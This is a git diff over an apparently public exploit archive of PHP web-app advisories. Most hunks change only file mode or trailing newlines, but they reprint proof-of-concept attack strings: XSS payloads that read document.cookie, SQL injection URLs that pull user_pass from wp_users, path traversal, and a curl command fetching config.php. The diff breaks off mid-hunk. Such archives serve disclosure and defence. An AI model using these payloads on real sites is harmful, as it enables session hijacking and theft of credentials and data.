a/platforms/php/webapps/37186.txt b/platforms/php/webapps/37186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37189.txt b/platforms/php/webapps/37189.txt old mode 100755 new mode 100644 index 113a9ceb4..ee11bd173 --- a/platforms/php/webapps/37189.txt +++ b/platforms/php/webapps/37189.txt @@ -8,4 +8,4 @@ Media Library Categories 1.1.1 is vulnerable; other versions may also be affecte http://www.example.com/wp-admin/admin.php?page=media-library-categories/add.php&bulk=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E&attachments=1 -http://www.example.com/wp-admin/upload.php?page=media-library-categories/view.php&q='><script>alert(1)</script> \ No newline at end of file +http://www.example.com/wp-admin/upload.php?page=media-library-categories/view.php&q='><script>alert(1)</script> \ No newline at end of file diff --git a/platforms/php/webapps/37190.txt b/platforms/php/webapps/37190.txt old mode 100755 new mode 100644 index 447777fca..a5879efad --- a/platforms/php/webapps/37190.txt +++ b/platforms/php/webapps/37190.txt @@ -8,4 +8,4 @@ LeagueManager 3.7 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/admin.php?page=leaguemanager&amp;subpage=show-league&amp;league_id=1&amp;group=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt; -http://www.example.com/wp-admin/admin.php?page=leaguemanager&amp;subpage=team&amp;edit=1&amp;season=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=leaguemanager&amp;subpage=team&amp;edit=1&amp;season=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37191.txt b/platforms/php/webapps/37191.txt old mode 100755 new mode 100644 index 52bc50e3b..ac2829907 --- a/platforms/php/webapps/37191.txt +++ b/platforms/php/webapps/37191.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Leaflet 0.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/admin.php?page=leaflet_layer&amp;id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=leaflet_layer&amp;id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37192.txt b/platforms/php/webapps/37192.txt old mode 100755 new mode 100644 index 844d655f1..4d5050d94 --- a/platforms/php/webapps/37192.txt +++ b/platforms/php/webapps/37192.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Leaflet 0.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/admin.php?page=leaflet_marker&amp;id=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt; \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=leaflet_marker&amp;id=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/37193.txt b/platforms/php/webapps/37193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37194.txt b/platforms/php/webapps/37194.txt old mode 100755 new mode 100644 index 341fe915d..7583804d1 --- a/platforms/php/webapps/37194.txt +++ b/platforms/php/webapps/37194.txt @@ -8,4 +8,4 @@ Mingle Forum 1.0.33 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/admin.php?page=mfstructure&amp;mingleforum_action=structure&amp;do=addforum&amp;groupid=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E -http://www.example.com/wp-admin/admin.php?page=mfgroups&amp;mingleforum_action=usergroups&amp;do=edit_usergroup&amp;usergroup_id=1%27%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=mfgroups&amp;mingleforum_action=usergroups&amp;do=edit_usergroup&amp;usergroup_id=1%27%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37195.txt b/platforms/php/webapps/37195.txt old mode 100755 new mode 100644 index 0a50b0599..2615a5a4d --- a/platforms/php/webapps/37195.txt +++ b/platforms/php/webapps/37195.txt @@ -12,4 +12,4 @@ http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.ph http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=editgroup&amp;groupid=2 AND 1=0 UNION SELECT user_pass FROM wp_users WHERE ID=1 -http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=usergroups&amp;do=edit_usergroup&amp;usergroup_id='&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt; \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=usergroups&amp;do=edit_usergroup&amp;usergroup_id='&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/37196.txt b/platforms/php/webapps/37196.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37200.txt b/platforms/php/webapps/37200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37201.txt b/platforms/php/webapps/37201.txt old mode 100755 new mode 100644 index 6f4c4b868..5fb643cbd --- a/platforms/php/webapps/37201.txt +++ b/platforms/php/webapps/37201.txt @@ -8,4 +8,4 @@ Sharebar 1.2.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/options-general.php?page=Sharebar&amp;t=edit&amp;id=1 AND 1=0 UNION SELECT 1,2,3,4,user_pass,6 FROM wp_users WHERE ID=1 -http://www.example.com/wp-content/plugins/sharebar/sharebar-admin.php?status=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/sharebar/sharebar-admin.php?status=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37202.txt b/platforms/php/webapps/37202.txt old mode 100755 new mode 100644 index 68bc0ebd4..84d42cf69 --- a/platforms/php/webapps/37202.txt +++ b/platforms/php/webapps/37202.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Share and Follow 1.80.3 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/admin.php?page=share-and-follow-menu -CDN API Key content: &quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt; \ No newline at end of file +CDN API Key content: &quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/37203.txt b/platforms/php/webapps/37203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37204.txt b/platforms/php/webapps/37204.txt old mode 100755 new mode 100644 index df564ecb5..4fd675cc0 --- a/platforms/php/webapps/37204.txt +++ b/platforms/php/webapps/37204.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Track That Stat 1.0.8 is vulnerable; other versions may also be affected. -http://www.example.com/wp.bacon/wp-content/plugins/track-that-stat/js/trackthatstat.php?data=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B \ No newline at end of file +http://www.example.com/wp.bacon/wp-content/plugins/track-that-stat/js/trackthatstat.php?data=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B \ No newline at end of file diff --git a/platforms/php/webapps/37205.txt b/platforms/php/webapps/37205.txt old mode 100755 new mode 100644 index 7b457f940..ae5125c5e --- a/platforms/php/webapps/37205.txt +++ b/platforms/php/webapps/37205.txt @@ -4,4 +4,4 @@ JW Player is prone to a cross-site scripting vulnerability because it fails to s An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/player.swf?debug=function(){alert('Simple Alert')} \ No newline at end of file +http://www.example.com/player.swf?debug=function(){alert('Simple Alert')} \ No newline at end of file diff --git a/platforms/php/webapps/37206.txt b/platforms/php/webapps/37206.txt old mode 100755 new mode 100644 index efb4704d9..34d0abed6 --- a/platforms/php/webapps/37206.txt +++ b/platforms/php/webapps/37206.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br phpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected. -GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.showpic.php?title="><script>alert(document.cookie);</script> HTTP/1.1 \ No newline at end of file +GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.showpic.php?title="><script>alert(document.cookie);</script> HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/37207.txt b/platforms/php/webapps/37207.txt old mode 100755 new mode 100644 index 46da9c543..771ffc002 --- a/platforms/php/webapps/37207.txt +++ b/platforms/php/webapps/37207.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br phpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected. -GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.random.php?dir="><script>alert(document.cookie);</script> HTTP/1.1 \ No newline at end of file +GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.random.php?dir="><script>alert(document.cookie);</script> HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/37208.txt b/platforms/php/webapps/37208.txt old mode 100755 new mode 100644 index e29483195..e6364f1ca --- a/platforms/php/webapps/37208.txt +++ b/platforms/php/webapps/37208.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow backupDB() 1.2.7a is vulnerable; other versions may also be affected. -http://www.example.com/backupDB/backupDB.php?onlyDB="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/backupDB/backupDB.php?onlyDB="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/37209.txt b/platforms/php/webapps/37209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37216.txt b/platforms/php/webapps/37216.txt old mode 100755 new mode 100644 index 767e48811..972f8b39d --- a/platforms/php/webapps/37216.txt +++ b/platforms/php/webapps/37216.txt @@ -4,4 +4,4 @@ The Unijimpe Captcha is prone to a cross-site scripting vulnerability because it An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E \ No newline at end of file +http://www.example.com/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37217.txt b/platforms/php/webapps/37217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37219.txt b/platforms/php/webapps/37219.txt old mode 100755 new mode 100644 index b38d70fe1..6d9c0f768 --- a/platforms/php/webapps/37219.txt +++ b/platforms/php/webapps/37219.txt @@ -8,4 +8,4 @@ PHP Address Book 7.0 is vulnerable; other versions may also be affected. http://www.example.com/addressbookv7.0.0/group.php/[XSS] -http://www.example.com/addressbookv7.0.0/translate.php?lang=en&target_language=[XSS] \ No newline at end of file +http://www.example.com/addressbookv7.0.0/translate.php?lang=en&target_language=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3722.txt b/platforms/php/webapps/3722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37224.txt b/platforms/php/webapps/37224.txt old mode 100755 new mode 100644 index 093194ac5..9141324d3 --- a/platforms/php/webapps/37224.txt +++ b/platforms/php/webapps/37224.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected. -http://www.example.com/search/?text=%27);alert(document.cookie)// \ No newline at end of file +http://www.example.com/search/?text=%27);alert(document.cookie)// \ No newline at end of file diff --git a/platforms/php/webapps/37226.txt b/platforms/php/webapps/37226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3723.txt b/platforms/php/webapps/3723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37243.txt b/platforms/php/webapps/37243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37244.txt b/platforms/php/webapps/37244.txt old mode 100755 new mode 100644 index 5d63513f5..c28471310 --- a/platforms/php/webapps/37244.txt +++ b/platforms/php/webapps/37244.txt @@ -107,4 +107,4 @@ if(!empty($allLinks) && is_array($allLinks)){ return array_unique(array_map("urldecode", $allLinks)); } } -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/37245.txt b/platforms/php/webapps/37245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37248.txt b/platforms/php/webapps/37248.txt old mode 100755 new mode 100644 index 6c2e523bc..0301be84e --- a/platforms/php/webapps/37248.txt +++ b/platforms/php/webapps/37248.txt @@ -102,4 +102,4 @@ ___________    ____   ____ _____  |  | __ ___________ |  |_> > __ \|   |  \  \___ / __ \|    <\  ___/|  | \/ |   __(____  /___|  /\___  >____  /__|_ \\___  >__| |__|       \/     \/     \/     \/     \/    \/ -.........................cant be pr0 without ascii art \ No newline at end of file +.........................cant be pr0 without ascii art \ No newline at end of file diff --git a/platforms/php/webapps/3725.php b/platforms/php/webapps/3725.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37252.txt b/platforms/php/webapps/37252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37253.txt b/platforms/php/webapps/37253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37254.txt b/platforms/php/webapps/37254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37255.txt b/platforms/php/webapps/37255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37257.txt b/platforms/php/webapps/37257.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37259.txt b/platforms/php/webapps/37259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37263.txt b/platforms/php/webapps/37263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37264.txt b/platforms/php/webapps/37264.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37266.txt b/platforms/php/webapps/37266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37270.txt b/platforms/php/webapps/37270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37274.txt b/platforms/php/webapps/37274.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37275.txt b/platforms/php/webapps/37275.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37283.txt b/platforms/php/webapps/37283.txt old mode 100755 new mode 100644 index 9280c63f0..1404e3fdb --- a/platforms/php/webapps/37283.txt +++ b/platforms/php/webapps/37283.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to steal cookie information, execute arbitrar http://www.example.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20 -http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest \ No newline at end of file +http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest \ No newline at end of file diff --git a/platforms/php/webapps/3729.txt b/platforms/php/webapps/3729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37290.txt b/platforms/php/webapps/37290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37296.txt b/platforms/php/webapps/37296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37301.txt b/platforms/php/webapps/37301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37302.txt b/platforms/php/webapps/37302.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37304.txt b/platforms/php/webapps/37304.txt old mode 100755 new mode 100644 index 3f4a255ef..c717ff9e5 --- a/platforms/php/webapps/37304.txt +++ b/platforms/php/webapps/37304.txt @@ -42,4 +42,4 @@ file:/modules/blackcat/widgets/logs.php POC: -curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip - \ No newline at end of file +curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip - \ No newline at end of file diff --git a/platforms/php/webapps/37305.txt b/platforms/php/webapps/37305.txt old mode 100755 new mode 100644 index 8f9ab4ed8..8a1b615b8 --- a/platforms/php/webapps/37305.txt +++ b/platforms/php/webapps/37305.txt @@ -4,4 +4,4 @@ Plogger Photo Gallery is prone to an SQL-injection vulnerability because it fail A successful exploit will allow an attacker to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database. -http://www.example.com/demo/plog-rss.php?id=1%27%22&level=collection \ No newline at end of file +http://www.example.com/demo/plog-rss.php?id=1%27%22&level=collection \ No newline at end of file diff --git a/platforms/php/webapps/37307.txt b/platforms/php/webapps/37307.txt old mode 100755 new mode 100644 index 4fa59f653..63cfa342d --- a/platforms/php/webapps/37307.txt +++ b/platforms/php/webapps/37307.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow phAlbum 1.5.1 is vulnerable; other versions may also be affected. -http://www.example.com/demos/phAlbum/index.php/%F6%22%20onmouseover=document.write%28%22index.html%22%29%20// \ No newline at end of file +http://www.example.com/demos/phAlbum/index.php/%F6%22%20onmouseover=document.write%28%22index.html%22%29%20// \ No newline at end of file diff --git a/platforms/php/webapps/37308.txt b/platforms/php/webapps/37308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37309.txt b/platforms/php/webapps/37309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3731.php b/platforms/php/webapps/3731.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37310.txt b/platforms/php/webapps/37310.txt old mode 100755 new mode 100644 index a596c711f..88c91abc2 --- a/platforms/php/webapps/37310.txt +++ b/platforms/php/webapps/37310.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view files and to execute local sc Ajaxmint Gallery 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/learn/ajaxmint/ajaxmint-gallery/admin/index.php?c=..\..\..\..\ajaxmint-gallery/pictures/5_me.jpg%00 [aka shell] \ No newline at end of file +http://www.example.com/learn/ajaxmint/ajaxmint-gallery/admin/index.php?c=..\..\..\..\ajaxmint-gallery/pictures/5_me.jpg%00 [aka shell] \ No newline at end of file diff --git a/platforms/php/webapps/37311.txt b/platforms/php/webapps/37311.txt old mode 100755 new mode 100644 index cc384ca9d..7a2f76cfb --- a/platforms/php/webapps/37311.txt +++ b/platforms/php/webapps/37311.txt @@ -9,4 +9,4 @@ Pligg CMS 1.2.2 is vulnerable; other versions may also be affected. http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_1_low=%22%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_1_high=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_2_low=%22%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E -http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_2_high=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_2_high=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37312.txt b/platforms/php/webapps/37312.txt old mode 100755 new mode 100644 index 056335547..5e08e61d1 --- a/platforms/php/webapps/37312.txt +++ b/platforms/php/webapps/37312.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br PragmaMX 1.12.1 is vulnerable; other versions may also be affected. -http://www.example.com/modules.php?name=Themetest&%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E \ No newline at end of file +http://www.example.com/modules.php?name=Themetest&%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37313.txt b/platforms/php/webapps/37313.txt old mode 100755 new mode 100644 index 6b7f953fa..a056a6b06 --- a/platforms/php/webapps/37313.txt +++ b/platforms/php/webapps/37313.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br PragmaMX 1.12.1 is vulnerable; other versions may also be affected. -http://www.example.com/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url=%22%3E%3Cscript%3E alert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url=%22%3E%3Cscript%3E alert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37314.txt b/platforms/php/webapps/37314.txt old mode 100755 new mode 100644 index e232d0978..633b69d65 --- a/platforms/php/webapps/37314.txt +++ b/platforms/php/webapps/37314.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability could allow an attacker to obtain potentially sens Yellow Duck Framework Beta1 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?id=./database/config.php \ No newline at end of file +http://www.example.com/index.php?id=./database/config.php \ No newline at end of file diff --git a/platforms/php/webapps/37315.txt b/platforms/php/webapps/37315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37316.txt b/platforms/php/webapps/37316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37317.txt b/platforms/php/webapps/37317.txt old mode 100755 new mode 100644 index ccb5d9e2f..f301b9d2e --- a/platforms/php/webapps/37317.txt +++ b/platforms/php/webapps/37317.txt @@ -10,4 +10,4 @@ http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default%00<script>alert("AkaStep");</script>&dir=../include/&f=config.inc.php -http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default&dir=../include/&f=config.inc.php \ No newline at end of file +http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default&dir=../include/&f=config.inc.php \ No newline at end of file diff --git a/platforms/php/webapps/37318.txt b/platforms/php/webapps/37318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3732.txt b/platforms/php/webapps/3732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37321.txt b/platforms/php/webapps/37321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37328.php b/platforms/php/webapps/37328.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37329.txt b/platforms/php/webapps/37329.txt old mode 100755 new mode 100644 index 0740c0284..3c8006a2e --- a/platforms/php/webapps/37329.txt +++ b/platforms/php/webapps/37329.txt @@ -10,4 +10,4 @@ http://www.example.com//search.php?q=[SQLi] http://www.example.com//lost.php/ [SQLi] -http://www.example.com/footer.php? [LFI] \ No newline at end of file +http://www.example.com/footer.php? [LFI] \ No newline at end of file diff --git a/platforms/php/webapps/3733.txt b/platforms/php/webapps/3733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37330.txt b/platforms/php/webapps/37330.txt old mode 100755 new mode 100644 index 6cc361ed2..ddbc6c4eb --- a/platforms/php/webapps/37330.txt +++ b/platforms/php/webapps/37330.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to download the database that contain sensiti Yamamah 1.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/yamamah/cp/export.php \ No newline at end of file +http://www.example.com/yamamah/cp/export.php \ No newline at end of file diff --git a/platforms/php/webapps/37337.txt b/platforms/php/webapps/37337.txt old mode 100755 new mode 100644 index 7863054b4..6bb742e61 --- a/platforms/php/webapps/37337.txt +++ b/platforms/php/webapps/37337.txt @@ -10,4 +10,4 @@ http://www.example.com/cart.php?a=add&domain=transfer&n913620=v992636 http://www.example.com/domainchecker.php?search=bulkregister&n946774=v992350 -http://www.example.com/cart.php?currency=2&gid=1&n972751=v976696 \ No newline at end of file +http://www.example.com/cart.php?currency=2&gid=1&n972751=v976696 \ No newline at end of file diff --git a/platforms/php/webapps/37338.txt b/platforms/php/webapps/37338.txt old mode 100755 new mode 100644 index 60c71edd6..8fa61d337 --- a/platforms/php/webapps/37338.txt +++ b/platforms/php/webapps/37338.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would run in the context of the affected WHMCS 5.0 is vulnerable; other versions may also be affected. -http://www.example.com/knowledgebase.php?action = [XSS] \ No newline at end of file +http://www.example.com/knowledgebase.php?action = [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37339.txt b/platforms/php/webapps/37339.txt old mode 100755 new mode 100644 index 539db52d4..a9b11c17c --- a/platforms/php/webapps/37339.txt +++ b/platforms/php/webapps/37339.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow VoipNow Professional 2.5.3 is vulnerable; other versions may also be vulnerable. -http://www.example.com/index.php?nsextt=[xss] \ No newline at end of file +http://www.example.com/index.php?nsextt=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/3734.txt b/platforms/php/webapps/3734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37340.html b/platforms/php/webapps/37340.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37341.txt b/platforms/php/webapps/37341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37342.txt b/platforms/php/webapps/37342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3735.txt b/platforms/php/webapps/3735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37350.txt b/platforms/php/webapps/37350.txt old mode 100755 new mode 100644 index 444901ff9..10ab6d6ee --- a/platforms/php/webapps/37350.txt +++ b/platforms/php/webapps/37350.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a AdaptCMS 2.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5-- \ No newline at end of file +http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5-- \ No newline at end of file diff --git a/platforms/php/webapps/37351.txt b/platforms/php/webapps/37351.txt old mode 100755 new mode 100644 index 95979926e..db167f843 --- a/platforms/php/webapps/37351.txt +++ b/platforms/php/webapps/37351.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a AdaptCMS 2.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ] \ No newline at end of file +http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ] \ No newline at end of file diff --git a/platforms/php/webapps/37352.txt b/platforms/php/webapps/37352.txt old mode 100755 new mode 100644 index 82d71c8ee..c4ef15110 --- a/platforms/php/webapps/37352.txt +++ b/platforms/php/webapps/37352.txt @@ -4,4 +4,4 @@ Ignite Solutions CMS is prone to an SQL-injection vulnerability because it fails Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/car-details.php?ID=[Sql] \ No newline at end of file +http://www.example.com/car-details.php?ID=[Sql] \ No newline at end of file diff --git a/platforms/php/webapps/37353.php b/platforms/php/webapps/37353.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37355.txt b/platforms/php/webapps/37355.txt old mode 100755 new mode 100644 index 129bf3e7e..454e0f25c --- a/platforms/php/webapps/37355.txt +++ b/platforms/php/webapps/37355.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access MyBB 1.6.8 is vulnerable; other versions may also be affected. -http://www.example.com/forums/member.php?action=profile&uid=[Sqli] \ No newline at end of file +http://www.example.com/forums/member.php?action=profile&uid=[Sqli] \ No newline at end of file diff --git a/platforms/php/webapps/37356.txt b/platforms/php/webapps/37356.txt old mode 100755 new mode 100644 index 5f2d8573a..a77738553 --- a/platforms/php/webapps/37356.txt +++ b/platforms/php/webapps/37356.txt @@ -12,4 +12,4 @@ http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export. http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=commentposed _user -http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user \ No newline at end of file diff --git a/platforms/php/webapps/37357.php b/platforms/php/webapps/37357.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3736.txt b/platforms/php/webapps/3736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37360.txt b/platforms/php/webapps/37360.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37361.txt b/platforms/php/webapps/37361.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37363.txt b/platforms/php/webapps/37363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37364.txt b/platforms/php/webapps/37364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37369.txt b/platforms/php/webapps/37369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37370.php b/platforms/php/webapps/37370.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37371.php b/platforms/php/webapps/37371.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37373.php b/platforms/php/webapps/37373.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37374.txt b/platforms/php/webapps/37374.txt old mode 100755 new mode 100644 index 81f252ede..70855f9a4 --- 